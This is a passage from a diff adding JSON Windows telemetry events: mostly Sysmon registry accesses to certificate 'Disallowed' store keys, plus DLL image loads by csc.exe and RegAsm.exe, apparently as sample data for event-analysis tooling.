"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "file", + "file_name": "CSC.EXE-F7BE4369.pf", + "file_path": "C:\\Windows\\Prefetch\\CSC.EXE-F7BE4369.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 